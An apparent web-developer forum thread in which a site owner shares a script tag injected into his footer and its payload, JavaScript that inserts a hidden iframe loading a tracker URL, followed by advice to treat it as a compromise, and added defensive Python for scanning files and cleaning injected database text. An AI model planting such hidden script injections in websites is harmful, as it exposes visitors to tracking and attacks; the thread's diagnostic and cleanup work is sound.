Thread: Rogue code?

  1. #1
    SitePoint Guru
    Join Date
    Nov 2000
    Posts
    741

    Rogue code?

    I found this code in the footer of my site:

    Code:
    <script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>
    If you follow that link, it takes you to a page with this code:

    Code:
    <html><head></head><body>SecBanner = {
        init: function () {
            this.dodiv();
            //document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>');
            var ad = document.createElement('iframe');
            var url = 'http://www.topadtackers.com/track.php?w=470008604&sh=7297e42f430cb7404fad83e64352409c';
            ad.setAttribute('src', url);
            ad.src = url;
            ad.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');
            ad.style.visibility = 'hidden';
            ad.style.display = 'none';
            var div = document.getElementById('SecAD');
            if(div == null) {
                var div = document.getElementById('footer');
            }
            if(div == null) {
                var div = document.getElementsByTagName('body')[0];
            }
            div.appendChild(ad);
        },
        dodiv: function() {
            document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>');
        }
    }
    SecBanner.init();</body></html>
    Any idea what that code does?

  2. #2
    dklynn, Certified Ethical Hacker
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,680
    Jon,

    If you didn't put it there, the simple fact that it's there means that you've been hacked. DELETE it immediately, strengthen your passwords, have your host run maldet scans (until you're clean), then run daily scans on vulnerable files (html, php, and js at a minimum). You just don't need hidden divs on your website which you didn't intend and it's not worth going through others' code which could lead you to their websites for ... well, attacks on you as a visitor.

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator
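
    One way to automate the recurring scan of html, php and js files recommended above, as an added example that is not part of the original thread. The allowlisted hosts, the function names and the sample footer are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the only hosts this site intentionally loads scripts or frames from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
# Constructed sample footer; line 3 is the script tag quoted in the first post.
SAMPLE = """<div id="footer">
<script src="http://www.example.com/site.js"></script>
<script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>
</div>"""

def host_of(url):
    try:
        return urlparse(url).hostname
    except ValueError:  # malformed bracketed host: report it rather than crash
        return "unparseable"

class TagFinder(HTMLParser):  # flags <script>/<iframe> tags that load from unlisted hosts
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        host = host_of(dict(attrs).get("src") or "")
        if tag in ("script", "iframe") and host and host not in ALLOWED_HOSTS:
            self.findings.append((self.getpos()[0], f"<{tag}> loads from unlisted host {host}"))

def scan_markup(text):  # HTML or PHP template text -> [(line, reason), ...]
    finder = TagFinder()
    finder.feed(text)
    return finder.findings

def scan_script(text):  # JavaScript text: absolute URLs that point at unlisted hosts
    return [(n, f"URL to unlisted host {host_of(u)}")
            for n, line in enumerate(text.splitlines(), 1)
            for u in URL_RE.findall(line)
            if host_of(u) not in ALLOWED_HOSTS]

def scan_tree(root):  # walk a web root; returns {path: findings} for files with hits
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".html", ".php", ".js"):
            text = path.read_text(errors="replace")
            hits = scan_script(text) if path.suffix.lower() == ".js" else scan_markup(text)
            if hits:
                report[str(path)] = hits
    return report
```

    Relative and same-site sources are ignored, so the report only lists tags and URLs that point at hosts missing from the allowlist.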

  3. #3
    SitePoint Guru
    Join Date
    Nov 2000
    Posts
    741
    Thanks for the recommendations.

  4. #4
    SitePoint Enthusiast
    Join Date
    Apr 2003
    Location
    London
    Posts
    39
    I had this happen to my site too a couple years back. The problem in my case was that I am using dynamic content on my site. It was a SQL Insertion attack; basically any TEXT fields in my database were full of those. They did it by executing a SQL stored procedure through one of my login forms (i.e., instead of a username they put a SQL escape sequence @@ that ran a stored procedure). So if you are using dynamic content for that footer, your DB may be riddled with them. If that's the case, make sure you are protecting against SQL insertion and run a script to clean up all the tables.


    Chuck
    --------------------------
    Add Poker Tables to your Website
    http://www.PlugInPoker.com
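
    A sketch of the cleanup script and the injection-safe login query described in the post above, as an added example that is not part of the original thread. It uses an in-memory SQLite database as a stand-in because the thread does not name the database engine; the table names, the allowlist and the sample rows are constructed for the illustration.

```python
import re
import sqlite3
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com"}  # assumption: hosts the site really loads scripts from
SCRIPT_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>\s*</script>""", re.I)

def strip_injected(value):
    """Remove external <script> tags whose host is not allowlisted."""
    def repl(m):
        try:
            host = urlparse(m.group(1)).hostname
        except ValueError:
            return m.group(0)  # leave unparseable tags for manual review
        return m.group(0) if host is None or host in ALLOWED_HOSTS else ""
    return SCRIPT_RE.sub(repl, value)

def clean_database(conn):
    """Rewrite every TEXT column in every table; returns the number of rows changed."""
    changed = 0
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = [c[1] for c in conn.execute(f'PRAGMA table_info("{table}")') if c[2].upper() == "TEXT"]
        for col in cols:
            rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)).fetchall()
            for rowid, value in rows:
                cleaned = strip_injected(value)
                if cleaned != value:
                    # Identifiers come from the schema; values are always bound parameters.
                    conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned, rowid))
                    changed += 1
    conn.commit()
    return changed

def check_login(conn, username, password_hash):
    """Login lookup with bound parameters: form input is data, never SQL text."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ? AND pw_hash = ?", (username, password_hash)).fetchone()
    return row is not None

def demo():
    """Constructed data: one clean page, one page with the injected tag appended."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('jon', 'constructed-hash')")
    bad = '<script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>'
    conn.executemany("INSERT INTO pages (body) VALUES (?)", [("<p>About us</p>",), ("<p>Footer</p>" + bad,)])
    return conn
```

    Take a backup before running a cleanup like this against real tables, and review what the pattern matches before letting it write.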

